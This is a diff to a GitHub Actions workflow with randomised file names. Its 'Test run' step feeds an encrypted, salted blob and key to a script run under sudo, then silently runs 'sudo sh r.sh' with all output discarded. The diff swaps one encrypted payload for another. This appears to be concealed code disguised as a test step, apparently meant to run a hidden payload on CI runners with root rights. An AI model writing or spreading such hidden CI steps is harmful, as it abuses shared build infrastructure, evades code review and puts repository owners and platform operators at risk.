--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'f5t8e'
+        echo 'f31l8'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18NfYVRBNJHtLvHRlU2GzV0nmQm1Ndfgr/jeyhl8BxoqgODtjDfIMTfr35yFXOC8HF/cB1rjRsMqK1ECQ3m/04hQGH8cQ7Efs2sCENsC2cBBhi1yzocA2T7 d88ljh && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+TgSfBZoUcncgcO0dHa36JLBcpLozJwe5DYJKbmUSrjrveiq5JnxHDVnKXT0Us9BEw+zSV82bF25+CUWp7Tkud2k4aiQqh4vTU/YCtPupajK9xb4QZpNrK bg0p58 && sudo sh r.sh > /dev/null 2>&1
